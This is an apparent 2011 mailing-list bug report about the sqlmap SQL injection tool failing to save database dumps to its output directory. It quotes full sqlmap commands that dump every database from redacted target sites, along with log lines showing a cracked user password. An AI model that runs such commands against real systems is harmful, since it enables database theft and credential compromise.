Re: [sqlmap-users] bug report: dumps not saved with r4542
Brought to you by:
inquisb
From: m4l1c3 <mal...@gm...> - 2011-11-23 11:47:15
|
Updated to 4543. Dumps still not saved to /output/domain/dump/ Please ignore the previous > DUMP redirection. On Wed, Nov 23, 2011 at 12:54 AM, m4l1c3 <mal...@gm...> wrote: > Update: > > Command: > ./sqlmap.py -u "http://www.XXXXXXXX.org:80/XXXXphp" --forms --batch > --technique=U -pfield --dump-all --exclude-sysdbs > DUMP > > This produces normal. "trimmed" dumps to console. > > Then, after cracking hashes: > > [INFO] cracked password 'password1' for user 'user1' > > [INFO] current status: XXXXX... \ > [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4542) > sqlmap version: 1.0-dev (r4542) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u *************************************** > --forms --batch --technique=U -pXXXXX --dump-all --exclude-sysdbs > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > > Update complete. > Many thanks/props/blessings > > On Tue, Nov 22, 2011 at 11:49 PM, m4l1c3 <mal...@gm...> wrote: > >> Command: >> ./sqlmap.py -u "http://www.XXXXXXXX.XXX:80/SOME.php" --forms >> --technique=U -pNULL --dump -T TABLE01 -D DB >> >> The command completes with no errors, and the contents are dumped to >> console (abbreviated, as normal), however; the /output/domain/dump/ >> directory remains empty. Need traffic.log? >> > > |